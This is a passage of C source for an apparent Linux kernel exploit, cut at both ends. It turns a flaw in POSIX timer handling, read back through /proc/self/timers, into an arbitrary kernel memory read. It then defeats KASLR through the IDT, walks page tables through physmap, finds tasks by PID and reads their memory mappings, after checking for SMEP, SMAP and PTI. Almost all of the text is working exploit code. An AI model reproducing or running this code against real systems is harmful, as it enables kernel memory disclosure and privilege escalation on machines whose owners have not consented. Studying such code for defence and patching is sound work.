((MMAP_ADDR_START - MIN_KERNEL_BASE) / 8)\n// == 0x4fe00000\n\n#define MAX_MAPPINGS 1024\n#define MEMFD_SIZE (MMAP_ADDR_SPAN / MAX_MAPPINGS)\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic struct proc_reader g_proc_reader;\nstatic unsigned long g_leak_ptr_addr = 0;\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define PROC_INITIAL_SIZE 1024\n#define PROC_CHUNK_SIZE 1024\n\nstruct proc_reader {\n\tchar *buffer;\n\tint buffer_size;\n\tint read_size;\n};\n\nstatic void proc_init(struct proc_reader* pr) {\n\tdebug2(\"proc_init: %016lx\\n\", pr);\n\n\tpr->buffer = malloc(PROC_INITIAL_SIZE);\n\tif (pr->buffer == NULL) {\n\t\tperror(\"[-] proc_init: malloc()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tpr->buffer_size = PROC_INITIAL_SIZE;\n\tpr->read_size = 0;\n\n\tdebug2(\"proc_init = void\\n\");\n}\n\nstatic void proc_ensure_size(struct proc_reader* pr, int size) {\n\tif (pr->buffer_size >= size)\n\t\treturn;\n\twhile (pr->buffer_size < size)\n\t\tpr->buffer_size <<= 1;\n\tpr->buffer = realloc(pr->buffer, pr->buffer_size);\n\tif (pr->buffer == NULL) {\n\t\tperror(\"[-] proc_ensure_size: realloc()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nstatic int proc_read(struct proc_reader* pr, const char *file) {\n\tdebug2(\"proc_read: file: %s, pr->buffer_size: %d\\n\",\n\t\t\tfile, pr->buffer_size);\n\n\tint fd = open(file, O_RDONLY);\n\tif (fd == -1) {\n\t\tperror(\"[-] proc_read: open()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tpr->read_size = 0;\n\twhile (true) {\n\t\tproc_ensure_size(pr, pr->read_size + PROC_CHUNK_SIZE);\n\t\tint bytes_read = read(fd, &pr->buffer[pr->read_size],\n\t\t\t\t\tPROC_CHUNK_SIZE);\n\t\tif (bytes_read == -1) {\n\t\t\tperror(\"[-] read(proc)\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\tpr->read_size += bytes_read;\n\t\tif (bytes_read < PROC_CHUNK_SIZE)\n\t\t\tbreak;\n\t}\n\n\tclose(fd);\n\n\tdebug2(\"proc_read = %d\\n\", pr->read_size);\n\treturn pr->read_size;\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\ntypedef union k_sigval {\n\tint sival_int;\n\tvoid *sival_ptr;\n} k_sigval_t;\n\n#define __ARCH_SIGEV_PREAMBLE_SIZE\t(sizeof(int) * 2 + sizeof(k_sigval_t))\n#define SIGEV_MAX_SIZE\t64\n#define SIGEV_PAD_SIZE\t((SIGEV_MAX_SIZE - __ARCH_SIGEV_PREAMBLE_SIZE) \\\n\t\t\t\t/ sizeof(int))\n\ntypedef struct k_sigevent {\n\tk_sigval_t sigev_value;\n\tint sigev_signo;\n\tint sigev_notify;\n\tunion {\n\t\tint _pad[SIGEV_PAD_SIZE];\n\t\tint _tid;\n\n\t\tstruct {\n\t\t\tvoid (*_function)(sigval_t);\n\t\t\tvoid *_attribute;\n\t\t} _sigev_thread;\n\t} _sigev_un;\n} k_sigevent_t;\n\nstatic void leak_setup() {\n\tk_sigevent_t se;\n\tmemset(&se, 0, sizeof(se));\n\tse.sigev_signo = SIGRTMIN;\n\tse.sigev_notify = OPTIMAL_PTR_OFFSET;\n\ttimer_t timerid = 0;\n\n\tint rv = syscall(SYS_timer_create, CLOCK_REALTIME,\n\t\t\t\t(void *)&se, &timerid);\n\tif (rv != 0) {\n\t\tperror(\"[-] timer_create()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nstatic void leak_parse(char *in, int in_len, char **start, char **end) {\n\tconst char *needle = \"notify: \";\n\t*start = memmem(in, in_len, needle, strlen(needle));\n\tassert(*start != NULL);\n\t*start += strlen(needle);\n\n\tassert(in_len > 0);\n\tassert(in[in_len - 1] == '\\n');\n\t*end = &in[in_len - 2];\n\twhile (*end > in && **end != '\\n')\n\t\t(*end)--;\n\tassert(*end > in);\n\twhile (*end > in && **end != '/')\n\t\t(*end)--;\n\tassert(*end > in);\n\tassert((*end)[1] = 'p' && (*end)[2] == 'i' && (*end)[3] == 'd');\n\n\tassert(*end >= *start);\n}\n\nstatic void leak_once(char **start, char **end) {\n\tint read_size = proc_read(&g_proc_reader, \"/proc/self/timers\");\n\tleak_parse(g_proc_reader.buffer, read_size, start, end);\n}\n\nstatic int leak_once_and_copy(char *out, int out_len) {\n\tassert(out_len > 0);\n\n\tchar *start, *end;\n\tleak_once(&start, &end);\n\n\tint size = min(end - start, out_len);\n\tmemcpy(out, start, size);\n\n\tif (size == out_len)\n\t\treturn size;\n\n\tout[size] = 0;\n\treturn size + 1;\n}\n\nstatic void leak_range(unsigned long addr, size_t length, char *out) {\n\tsize_t total_leaked = 0;\n\twhile (total_leaked < length) {\n\t\tunsigned long addr_to_leak = addr + total_leaked;\n\t\t*(unsigned long *)g_leak_ptr_addr = addr_to_leak;\n\t\tdebug2(\"leak_range: offset %ld, addr: %lx\\n\",\n\t\t\ttotal_leaked, addr_to_leak);\n\t\tint leaked = leak_once_and_copy(out + total_leaked,\n\t\t\tlength - total_leaked);\n\t\ttotal_leaked += leaked;\n\t}\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic void mmap_fixed(unsigned long addr, size_t size) {\n\tvoid *rv = mmap((void *)addr, size, PROT_READ | PROT_WRITE,\n\t\t\tMAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n\tif (rv != (void *)addr) {\n\t\tperror(\"[-] mmap()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nstatic void mmap_fd_over(int fd, unsigned long fd_size, unsigned long start,\n\t\t\tunsigned long end) {\n\tint page_size = PAGE_SIZE;\n\tassert(fd_size % page_size == 0);\n\tassert(start % page_size == 0);\n\tassert(end % page_size == 0);\n\tassert((end - start) % fd_size == 0);\n\n\tdebug1(\"mmap_fd_over: [%lx, %lx)\\n\", start, end);\n\n\tunsigned long addr;\n\tfor (addr = start; addr < end; addr += fd_size) {\n\t\tvoid *rv = mmap((void *)addr, fd_size, PROT_READ,\n\t\t\t\tMAP_FIXED | MAP_PRIVATE, fd, 0);\n\t\tif (rv != (void *)addr) {\n\t\t\tperror(\"[-] mmap()\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t}\n\n\tdebug1(\"mmap_fd_over = void\\n\");\n}\n\nstatic void remap_fd_over(int fd, unsigned long fd_size, unsigned long start,\n\t\t\tunsigned long end) {\n\tint rv = munmap((void *)start, end - start);\n\tif (rv != 0) {\n\t\tperror(\"[-] munmap()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tmmap_fd_over(fd, fd_size, start, end);\n}\n\n#define MEMFD_CHUNK_SIZE 0x1000\n\nstatic int create_filled_memfd(const char *name, unsigned long size,\n\t\t\t\tunsigned long value) {\n\tint i;\n\tchar buffer[MEMFD_CHUNK_SIZE];\n\n\tassert(size % MEMFD_CHUNK_SIZE == 0);\n\n\tint fd = syscall(SYS_memfd_create, name, 0);\n\tif (fd < 0) {\n\t\tperror(\"[-] memfd_create()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tfor (i = 0; i < sizeof(buffer) / sizeof(value); i++)\n\t\t*(unsigned long *)&buffer[i * sizeof(value)] = value;\n\n\tfor (i = 0; i < size / sizeof(buffer); i++) {\n\t\tint bytes_written = write(fd, &buffer[0], sizeof(buffer));\n\t\tif (bytes_written != sizeof(buffer)) {\n\t\t\tperror(\"[-] write(memfd)\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t}\n\n\treturn fd;\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic const char *evil = \"evil\";\nstatic const char *good = \"good\";\n\nstatic bool bisect_probe() {\n\tchar *start, *end;\n\tleak_once(&start, &end);\n\treturn *start == 'g';\n}\n\nstatic unsigned long bisect_via_memfd(unsigned long fd_size,\n\t\t\t\tunsigned long start, unsigned long end) {\n\tassert((end - start) % fd_size == 0);\n\n\tint fd_evil = create_filled_memfd(\"evil\", fd_size, (unsigned long)evil);\n\tint fd_good = create_filled_memfd(\"good\", fd_size, (unsigned long)good);\n\n\tunsigned long left = 0;\n\tunsigned long right = (end - start) / fd_size;\n\n\twhile (right - left > 1) {\n\t\tunsigned long middle = left + (right - left) / 2;\n\t\tremap_fd_over(fd_evil, fd_size, start + left * fd_size,\n\t\t\t\tstart + middle * fd_size);\n\t\tremap_fd_over(fd_good, fd_size, start + middle * fd_size,\n\t\t\t\tstart + right * fd_size);\n\t\tbool probe = bisect_probe();\n\t\tif (probe)\n\t\t\tleft = middle;\n\t\telse\n\t\t\tright = middle;\n\t}\n\n\tint rv = munmap((void *)start, end - start);\n\tif (rv != 0) {\n\t\tperror(\"[-] munmap()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tclose(fd_evil);\n\tclose(fd_good);\n\n\treturn start + left * fd_size;\n}\n\nstatic unsigned long bisect_via_assign(unsigned long start, unsigned long end) {\n\tint word_size = sizeof(unsigned long);\n\n\tassert((end - start) % word_size == 0);\n\tassert((end - start) % PAGE_SIZE == 0);\n\n\tmmap_fixed(start, end - start);\n\n\tunsigned long left = 0;\n\tunsigned long right = (end - start) / word_size;\n\n\twhile (right - left > 1) {\n\t\tunsigned long middle = left + (right - left) / 2;\n\t\tunsigned long a;\n\t\tfor (a = left; a < middle; a++)\n\t\t\t*(unsigned long *)(start + a * word_size) =\n\t\t\t\t(unsigned long)evil;\n\t\tfor (a = middle; a < right; a++)\n\t\t\t*(unsigned long *)(start + a * word_size) =\n\t\t\t\t(unsigned long)good;\n\t\tbool probe = bisect_probe();\n\t\tif (probe)\n\t\t\tleft = middle;\n\t\telse\n\t\t\tright = middle;\n\t}\n\n\tint rv = munmap((void *)start, end - start);\n\tif (rv != 0) {\n\t\tperror(\"[-] munmap()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\treturn start + left * word_size;\n}\n\nstatic unsigned long bisect_leak_ptr_addr() {\n\tunsigned long addr = bisect_via_memfd(\n\t\t\tMEMFD_SIZE, MMAP_ADDR_START, MMAP_ADDR_END);\n\tdebug1(\"%lx %lx\\n\", addr, addr + MEMFD_SIZE);\n\taddr = bisect_via_memfd(PAGE_SIZE, addr, addr + MEMFD_SIZE);\n\tdebug1(\"%lx %lx\\n\", addr, addr + PAGE_SIZE);\n\taddr = bisect_via_assign(addr, addr + PAGE_SIZE);\n\tdebug1(\"%lx\\n\", addr);\n\treturn addr;\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define CPUINFO_SMEP\t1\n#define CPUINFO_SMAP\t2\n#define CPUINFO_KAISER\t4\n#define CPUINFO_PTI\t8\n\nstatic int cpuinfo_scan() {\n\tint length = proc_read(&g_proc_reader, \"/proc/cpuinfo\");\n\tchar *buffer = &g_proc_reader.buffer[0];\n\tint rv = 0;\n\tchar* found = memmem(buffer, length, \"smep\", 4);\n\tif (found != NULL)\n\t\trv |= CPUINFO_SMEP;\n\tfound = memmem(buffer, length, \"smap\", 4);\n\tif (found != NULL)\n\t\trv |= CPUINFO_SMAP;\n\tfound = memmem(buffer, length, \"kaiser\", 4);\n\tif (found != NULL)\n\t\trv |= CPUINFO_KAISER;\n\tfound = memmem(buffer, length, \" pti\", 4);\n\tif (found != NULL)\n\t\trv |= CPUINFO_PTI;\n\treturn rv;\n}\n\nstatic void cpuinfo_check() {\n\tint rv = cpuinfo_scan();\n\tif (rv & CPUINFO_SMAP) {\n\t\tinfo(\"[-] SMAP detected, no bypass available, aborting\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic void arbitrary_read_init() {\n\tinfo(\"[.] setting up proc reader\\n\");\n\tproc_init(&g_proc_reader);\n\tinfo(\"[~] done\\n\");\n\n\tinfo(\"[.] checking /proc/cpuinfo\\n\");\n\tcpuinfo_check();\n\tinfo(\"[~] looks good\\n\");\n\n\tinfo(\"[.] setting up timer\\n\");\n\tleak_setup();\n\tinfo(\"[~] done\\n\");\n\n\tinfo(\"[.] finding leak pointer address\\n\");\n\tg_leak_ptr_addr = bisect_leak_ptr_addr();\n\tinfo(\"[+] done: %016lx\\n\", g_leak_ptr_addr);\n\n\tinfo(\"[.] mapping leak pointer page\\n\");\n\tmmap_fixed(g_leak_ptr_addr & ~(PAGE_SIZE - 1), PAGE_SIZE);\n\tinfo(\"[~] done\\n\");\n}\n\nstatic void read_range(unsigned long addr, size_t length, char *buffer) {\n\tleak_range(addr, length, buffer);\n}\n\nstatic uint64_t read_8(unsigned long addr) {\n\tuint64_t result;\n\tread_range(addr, sizeof(result), (char *)&result);\n\treturn result;\n}\n\nstatic uint32_t read_4(unsigned long addr) {\n\tuint32_t result;\n\tread_range(addr, sizeof(result), (char *)&result);\n\treturn result;\n}\n\nstatic uint64_t read_field_8(unsigned long addr, int offset) {\n\treturn read_8(addr + offset);\n}\n\nstatic uint64_t read_field_4(unsigned long addr, int offset) {\n\treturn read_4(addr + offset);\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstruct idt_register {\n\tuint16_t length;\n\tuint64_t base;\n} __attribute__((packed));\n\nstruct idt_gate {\n\tuint16_t offset_1; // bits 0..15\n\tuint32_t shit_1;\n\tuint16_t offset_2; // bits 16..31\n\tuint32_t offset_3; // bits 32..63\n\tuint32_t shit_2;\n} __attribute__((packed));\n\nstatic uint64_t idt_gate_addr(struct idt_gate *gate) {\n\tuint64_t addr = gate->offset_1 + ((uint64_t)gate->offset_2 << 16) +\n\t\t((uint64_t)gate->offset_3 << 32);\n\treturn addr;\n}\n\nstatic void get_idt(struct idt_register *idtr) {\n\tasm ( \"sidt %0\" : : \"m\"(*idtr) );\n\tdebug1(\"get_idt_base: base: %016lx, length: %d\\n\",\n\t\t\tidtr->base, idtr->length);\n}\n\nstatic void print_idt(int entries) {\n\tchar buffer[4096];\n\tstruct idt_register idtr;\n\tint i;\n\n\tget_idt(&idtr);\n\tassert(idtr.length <= sizeof(buffer));\n\tread_range(idtr.base, idtr.length, &buffer[0]);\n\n\tinfo(\"base: %016lx, length: %d\\n\", idtr.base,\n\t\t\t(int)idtr.length);\n\n\tentries = min(entries, idtr.length / sizeof(struct idt_gate));\n\tfor (i = 0; i < entries; i++) {\n\t\tstruct idt_gate *gate = (struct idt_gate *)&buffer[0] + i;\n\t\tuint64_t addr = idt_gate_addr(gate);\n\t\tinfo(\"gate #%03d: %016lx\\n\", i, addr);\n\t}\n}\n\nstatic uint64_t read_idt_gate(int i) {\n\tchar buffer[4096];\n\tstruct idt_register idtr;\n\n\tget_idt(&idtr);\n\tassert(idtr.length <= sizeof(buffer));\n\tassert(i <= idtr.length / sizeof(struct idt_gate));\n\tread_range(idtr.base, idtr.length, &buffer[0]);\n\n\tstruct idt_gate *gate = (struct idt_gate *)&buffer[0] + i;\n\tuint64_t addr = idt_gate_addr(gate);\n\treturn addr;\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define PTRS_PER_PGD\t\t512\n#define PTRS_PER_PUD\t\t512\n#define PTRS_PER_PMD\t\t512\n#define PTRS_PER_PTE\t\t512\n\n#define PGD_SHIFT\t\t39\n#define PUD_SHIFT\t\t30\n#define PMD_SHIFT\t\t21\n\n#define pgd_index(addr)\t\t(((addr) >> PGD_SHIFT) & (PTRS_PER_PGD - 1))\n#define pud_index(addr)\t\t(((addr) >> PUD_SHIFT) & (PTRS_PER_PUD - 1))\n#define pmd_index(addr)\t\t(((addr) >> PMD_SHIFT) & (PTRS_PER_PMD - 1))\n#define pte_index(addr)\t\t(((addr) >> PAGE_SHIFT) & (PTRS_PER_PTE - 1))\n\n#define _PAGE_BIT_PRESENT\t0\n#define _PAGE_BIT_ACCESSED\t5\n#define _PAGE_BIT_DIRTY\t\t6\n#define _PAGE_BIT_PSE\t\t7\n#define _PAGE_BIT_GLOBAL\t8\n#define _PAGE_BIT_PROTNONE\t_PAGE_BIT_GLOBAL\n\n#define _PAGE_PRESENT\t\t(1ul << _PAGE_BIT_PRESENT)\n#define _PAGE_ACCESSED\t\t(1ul << _PAGE_BIT_ACCESSED)\n#define _PAGE_DIRTY\t\t(1ul << _PAGE_BIT_DIRTY)\n#define _PAGE_PSE\t\t(1ul << _PAGE_BIT_PSE)\n#define _PAGE_PROTNONE\t\t(1ul << _PAGE_BIT_PROTNONE)\n#define _PAGE_KNL_ERRATUM_MASK\t(_PAGE_DIRTY | _PAGE_ACCESSED)\n\n#define pgd_none(value)\t\t((value) == 0)\n#define pud_none(value)\t\t(((value) & ~(_PAGE_KNL_ERRATUM_MASK)) == 0)\n#define pmd_none(value)\t\t(((value) & ~(_PAGE_KNL_ERRATUM_MASK)) == 0)\n#define pte_none(value)\t\t(((value) & ~(_PAGE_KNL_ERRATUM_MASK)) == 0)\n\n#define __PHYSICAL_MASK_SHIFT\t52\n#define __PHYSICAL_MASK\t\t((1ul << __PHYSICAL_MASK_SHIFT) - 1)\n#define PHYSICAL_PAGE_MASK\t(PAGE_MASK & __PHYSICAL_MASK)\n#define PTE_PFN_MASK\t\t(PHYSICAL_PAGE_MASK)\n#define PTE_FLAGS_MASK\t\t(~PTE_PFN_MASK)\n\n#define pgd_flags(value)\t(value & PTE_FLAGS_MASK)\n#define pud_flags(value)\t(value & PTE_FLAGS_MASK)\n#define pmd_flags(value)\t(value & PTE_FLAGS_MASK)\n#define pte_flags(value)\t(value & PTE_FLAGS_MASK)\n\n#define pgd_present(value)\t(pgd_flags(value) & _PAGE_PRESENT)\n#define pud_present(value)\t(pud_flags(value) & _PAGE_PRESENT)\n#define pmd_present(value)\t(pmd_flags(value) & (_PAGE_PRESENT | \\\n\t\t\t\t\t_PAGE_PROTNONE | _PAGE_PSE))\n#define pte_present(value)\t(pte_flags(value) & (_PAGE_PRESENT | \\\n\t\t\t\t\t_PAGE_PROTNONE))\n\nstruct pte_entry {\n\tunsigned long\t\taddr;\n\tunsigned long\t\tentries[PTRS_PER_PTE];\n};\n\nstruct pmd_entry {\n\tunsigned long\t\taddr;\n\tstruct {\n\t\tbool\t\t\t\thuge;\n\t\tunion {\n\t\t\tstruct pte_entry\t*pte;\n\t\t\tunsigned long\t\tphys;\n\t\t};\n\t}\t\t\tentries[PTRS_PER_PMD];\n};\n\nstruct pud_entry {\n\tunsigned long\t\taddr;\n\tstruct pmd_entry\t*entries[PTRS_PER_PUD];\n};\n\nstruct pgd_entry {\n\tunsigned long\t\taddr;\n\tstruct pud_entry\t*entries[PTRS_PER_PGD];\n};\n\nstruct ptsc {\n\tunsigned long\t\tphysmap;\n\tstruct pgd_entry\tentry;\n};\n\nstatic struct pte_entry *ptsc_alloc_pte_entry(unsigned long addr) {\n\tstruct pte_entry *entry = malloc(sizeof(*entry));\n\tif (!entry) {\n\t\tperror(\"[-] malloc()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tentry->addr = addr;\n\tmemset(&entry->entries[0], 0, sizeof(entry->entries));\n\treturn entry;\n}\n\nstatic struct pmd_entry *ptsc_alloc_pmd_entry(unsigned long addr) {\n\tstruct pmd_entry *entry = malloc(sizeof(*entry));\n\tif (!entry) {\n\t\tperror(\"[-] malloc()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tentry->addr = addr;\n\tmemset(&entry->entries[0], 0, sizeof(entry->entries));\n\treturn entry;\n}\n\nstatic struct pud_entry *ptsc_alloc_pud_entry(unsigned long addr) {\n\tstruct pud_entry *entry = malloc(sizeof(*entry));\n\tif (!entry) {\n\t\tperror(\"[-] malloc()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tentry->addr = addr;\n\tmemset(&entry->entries[0], 0, sizeof(entry->entries));\n\treturn entry;\n}\n\nstatic void ptsc_init(struct ptsc* ptsc, unsigned long physmap,\n\t\t\t\tunsigned long pgd) {\n\tptsc->physmap = physmap;\n\tptsc->entry.addr = pgd;\n\tmemset(&ptsc->entry.entries[0], 0, sizeof(ptsc->entry.entries));\n}\n\nstatic unsigned long ptsc_page_virt_to_phys(struct ptsc* ptsc,\n\t\t\t\t\t\tunsigned long addr) {\n\tstruct pgd_entry *pgd_e;\n\tstruct pud_entry *pud_e;\n\tstruct pmd_entry *pmd_e;\n\tstruct pte_entry *pte_e;\n\tunsigned long phys_a;\n\tint index;\n\n\tdebug1(\"looking up phys addr for %016lx:\\n\", addr);\n\n\tpgd_e = &ptsc->entry;\n\n\tindex = pgd_index(addr);\n\tdebug1(\" pgd: %016lx, index: %d\\n\", pgd_e->addr, index);\n\tif (!pgd_e->entries[index]) {\n\t\tunsigned long pgd_v = read_8(\n\t\t\tpgd_e->addr + index * sizeof(unsigned long));\n\t\tdebug1(\" -> %016lx\\n\", pgd_v);\n\t\tif (pgd_none(pgd_v)) {\n\t\t\tdebug1(\" not found, pgd is none\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tif (!pgd_present(pgd_v)) {\n\t\t\tdebug1(\" not found, pgd is not present\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tunsigned long pud_a =\n\t\t\tptsc->physmap + (pgd_v & PHYSICAL_PAGE_MASK);\n\t\tpud_e = ptsc_alloc_pud_entry(pud_a);\n\t\tpgd_e->entries[index] = pud_e;\n\t}\n\tpud_e = pgd_e->entries[index];\n\n\tindex = pud_index(addr);\n\tdebug1(\" pud: %016lx, index: %d\\n\", pud_e->addr, index);\n\tif (!pud_e->entries[index]) {\n\t\tunsigned long pud_v = read_8(\n\t\t\tpud_e->addr + index * sizeof(unsigned long));\n\t\tdebug1(\" -> %016lx\\n\", pud_v);\n\t\tif (pud_none(pud_v)) {\n\t\t\tdebug1(\" not found, pud is none\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tif (!pud_present(pud_v)) {\n\t\t\tdebug1(\" not found, pud is not present\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tunsigned long pmd_a =\n\t\t\tptsc->physmap + (pud_v & PHYSICAL_PAGE_MASK);\n\t\tpmd_e = ptsc_alloc_pmd_entry(pmd_a);\n\t\tpud_e->entries[index] = pmd_e;\n\t}\n\tpmd_e = pud_e->entries[index];\n\n\tindex = pmd_index(addr);\n\tdebug1(\" pmd: %016lx, index: %d\\n\", pmd_e->addr, index);\n\tif (!pmd_e->entries[index].pte) {\n\t\tunsigned long pmd_v = read_8(\n\t\t\tpmd_e->addr + index * sizeof(unsigned long));\n\t\tdebug1(\" -> %016lx\\n\", pmd_v);\n\t\tif (pmd_none(pmd_v)) {\n\t\t\tdebug1(\" not found, pmd is none\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tif (!pmd_present(pmd_v)) {\n\t\t\tdebug1(\" not found, pmd is not present\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tif (pmd_flags(pmd_v) & _PAGE_PSE) {\n\t\t\tphys_a = ptsc->physmap + (pmd_v & PHYSICAL_PAGE_MASK) +\n\t\t\t\t\t(addr & ~HUGE_PAGE_MASK);\n\t\t\tpmd_e->entries[index].phys = phys_a;\n\t\t\tpmd_e->entries[index].huge = true;\n\t\t} else {\n\t\t\tunsigned long pte_a =\n\t\t\t\tptsc->physmap + (pmd_v & PHYSICAL_PAGE_MASK);\n\t\t\tpte_e = ptsc_alloc_pte_entry(pte_a);\n\t\t\tpmd_e->entries[index].pte = pte_e;\n\t\t\tpmd_e->entries[index].huge = false;\n\t\t}\n\t}\n\n\tif (pmd_e->entries[index].huge) {\n\t\tdebug1(\" phy: %016lx (huge)\\n\", phys_a);\n\t\treturn pmd_e->entries[index].phys;\n\t}\n\n\tpte_e = pmd_e->entries[index].pte;\n\n\tindex = pte_index(addr);\n\tdebug1(\" pte: %016lx, index: %d\\n\", pte_e->addr, index);\n\tif (!pte_e->entries[index]) {\n\t\tunsigned long pte_v = read_8(\n\t\t\tpte_e->addr + index * sizeof(unsigned long));\n\t\tdebug1(\" -> %016lx\\n\", pte_v);\n\t\tif (pte_none(pte_v)) {\n\t\t\tdebug1(\" not found, pte is none\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tif (!pte_present(pte_v)) {\n\t\t\tdebug1(\" not found, pte is not present\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tphys_a = ptsc->physmap + (pte_v & PHYSICAL_PAGE_MASK) +\n\t\t\t\t(addr & ~PAGE_MASK);\n\t\tpte_e->entries[index] = phys_a;\n\t}\n\tphys_a = pte_e->entries[index];\n\n\treturn phys_a;\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic unsigned long find_task_by_pid(unsigned long init_task, unsigned pid) {\n\tunsigned long cur_task = init_task;\n\t\n\twhile (true) {\n\t\tunsigned cur_pid =\n\t\t\tread_field_4(cur_task, O_TASK_STRUCT_PID);\n\t\tif (cur_pid == pid)\n\t\t\treturn cur_task;\n\t\tunsigned long task_next_ptr =\n\t\t\tread_field_8(cur_task, O_TASK_STRUCT_TASKS);\n\t\tcur_task = task_next_ptr - O_TASK_STRUCT_TASKS;\n\t\tif (cur_task == init_task)\n\t\t\treturn 0;\n\t}\n}\n\n#define MAX_MMAPS_PER_TASK 512\n\nstruct mmap_entry {\n\tunsigned long start;\n\tunsigned long end;\n\tunsigned flags;\n};\n\ntypedef void (*mmap_callback)(struct mmap_entry *entry, void *private);\n\nstatic void for_each_mmap_from(unsigned long mmap, mmap_callback callback,\n\t\t\t\tvoid *private) {\n\tstruct mmap_entry entries[MAX_MMAPS_PER_TASK];\n\tint i, count;\n\n\tcount = 0;\n\twhile (mmap != 0) {\n\t\tassert(count < MAX_MMAPS_PER_TASK);\n\t\tunsigned long vm_start =\n\t\t\tread_field_8(mmap, O_VM_AREA_STRUCT_VM_START);\n\t\tunsigned long vm_end =\n\t\t\tread_field_8(mmap, O_VM_AREA_STRUCT_VM_END);\n\t\tif (vm_start >= TASK_SIZE || vm_end >= TASK_SIZE) {\n\t\t\tinfo(\"[-] bad mmap (did the task die?)\\n\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\tunsigned vm_flags =\n\t\t\tread_field_4(mmap, O_VM_AREA_STRUCT_VM_FLAGS);\n\t\tentries[count].start = vm_start;\n\t\tentries[count].end = vm_end;\n\t\tentries[count].flags = vm_flags;\n\t\tcount++;\n\t\tmmap = read_field_8(mmap, O_VM_AREA_STRUCT_VM_NEXT);\n\t}\n\n\tfor (i = 0; i < count; i++)\n\t\tcallback(&entries[i], private);\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic unsigned long g_kernel_text = 0;\nstatic unsigned long g_physmap = 0;\n\nstatic struct ptsc g_ptsc;\n\nstatic void physmap_init() {\n\tunsigned long divide_error = read_idt_gate(0);\n\tinfo(\"[.] divide_error: %016lx\\n\", divide_error);\n\n\tg_kernel_text = divide_error - O_DIVIDE_ERROR;\n\tinfo(\"[.] kernel text: %016lx\\n\", g_kernel_text);\n\n\tif (O_PAGE_OFFSET_BASE) {\n\t\tunsigned long page_offset_base =\n\t\t\tg_kernel_text + O_PAGE_OFFSET_BASE;\n\t\tinfo(\"[.] page_offset_base: %016lx\\n\", page_offset_base);\n\n\t\tg_physmap = read_8(page_offset_base);\n\t\tinfo(\"[.] physmap: %016lx\\n\", g_physmap);\n\t\tif (g_physmap < PAGE_OFFSET_BASE) {\n\t\t\tinfo(\"[-] physmap sanity check failed \"\n\t\t\t\t\t\"(wrong offset?)\\n\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t} else {\n\t\tg_physmap = PAGE_OFFSET_BASE;\n\t\tinfo(\"[.] physmap: %016lx\\n\", g_physmap);\n\t}\n}\n\nstatic unsigned long g_mmap = 0;\n\nstatic void pts_init(int pid) {\n\tunsigned long mm;\n\n\tif (pid != 0) {\n\t\tunsigned long init_task = g_kernel_text + O_INIT_TASK;\n\t\tinfo(\"[.] init_task: %016lx\\n\", init_task);\n\n\t\tunsigned long task = find_task_by_pid(init_task, pid);\n\t\tinfo(\"[.] task: %016lx\\n\", task);\n\t\tif (task == 0) {\n\t\t\tinfo(\"[-] task %d not found\\n\", pid);\n\t\t\texit(EXIT_FAILURE);\n\t\t} else if (task < PAGE_OFFSET_BASE) {\n\t\t\tinfo(\"[-] task sanity check failed (wrong offset?)\\n\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\n\t\tmm = read_field_8(task, O_TASK_STRUCT_MM);\n\t\tinfo(\"[.] task->mm: %016lx\\n\", mm);\n\t\tif (mm == 0) {\n\t\t\tinfo(\"[-] mm not found (kernel task?)\\n\");\n\t\t\texit(EXIT_FAILURE);\n\t\t} else if (mm < PAGE_OFFSET_BASE) {\n\t\t\tinfo(\"[-] mm sanity check failed (wrong offset?)\\n\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\n\t\tg_mmap = read_field_8(mm, O_MM_STRUCT_MMAP);\n\t\tinfo(\"[.] task->mm->mmap: %016lx\\n\", g_mmap);\n\t\tif (g_mmap < 